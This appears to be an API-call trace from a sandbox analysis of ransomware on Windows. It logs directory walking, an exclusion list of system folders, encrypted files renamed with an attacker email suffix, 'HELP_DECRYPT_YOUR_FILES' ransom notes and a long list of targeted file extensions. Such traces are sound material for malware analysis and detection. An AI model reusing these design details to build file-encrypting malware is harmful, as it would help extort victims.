	[0171.533] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="packages") returned 0x0
	[0171.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.533] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="cookies") returned 0x0
	[0171.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.533] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*.*", lpSrch="programdata") returned 0x0
	[0171.534] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.534] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.534] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7fc0aeda, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fc3122f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.534] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.534] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fbbea5c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fbbea5c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fbbea5c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xea0, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="CUSTOM~1.SCL")) returned 1
	[0171.534] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fc3122f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fc3122f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fc5739a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.534] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fc3122f, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fc3122f, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fc3122f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.534] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fc0aeda, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fc0aeda, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fc0aeda, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x0, dwReserved1=0x0, cFileName="masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="MASTER~1.SCL")) returned 1
	[0171.534] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0171.535] lstrcmpW (lpString1="Prov", lpString2="..") returned 1
	[0171.535] lstrcmpW (lpString1="Prov", lpString2=".") returned 1
	[0171.535] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}"
	[0171.535] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\"
	[0171.535] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\", lpString2="Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov"
	[0171.535] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov"
	[0171.535] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\"
	[0171.535] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\"
	[0171.535] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*"
	[0171.536] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0171.574] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*") returned 89
	[0171.574] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.575] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*") returned 0x59
	[0171.575] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.575] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="windows") returned 0x0
	[0171.575] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.575] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="boot") returned 0x0
	[0171.575] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.575] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="system volume information") returned 0x0
	[0171.575] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.576] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.576] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.576] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0171.576] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.576] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0171.577] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.577] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.577] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.577] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0171.577] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0171.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0171.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.578] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0171.578] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.579] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0171.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.579] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.579] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.579] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0171.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.580] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0171.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.580] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0171.580] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.581] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0171.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.581] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0171.581] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.581] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0171.581] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="..", cAlternateFileName="")) returned 1
	[0171.582] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0171.582] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e60513, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e60513, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x22f, dwReserved0=0x340065, dwReserved1=0x7d0039, cFileName="RunTime.xml", cAlternateFileName="")) returned 1
	[0171.582] lstrcmpW (lpString1="RunTime.xml", lpString2="..") returned 1
	[0171.582] lstrcmpW (lpString1="RunTime.xml", lpString2=".") returned 1
	[0171.582] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\"
	[0171.582] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\", lpString2="RunTime.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml"
	[0171.582] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml") returned 97
	[0171.582] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.583] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml") returned 0x61
	[0171.583] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.583] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.583] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"
	[0171.583] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml") returned 97
	[0171.583] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.584] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0171.584] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.585] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0171.585] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.585] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
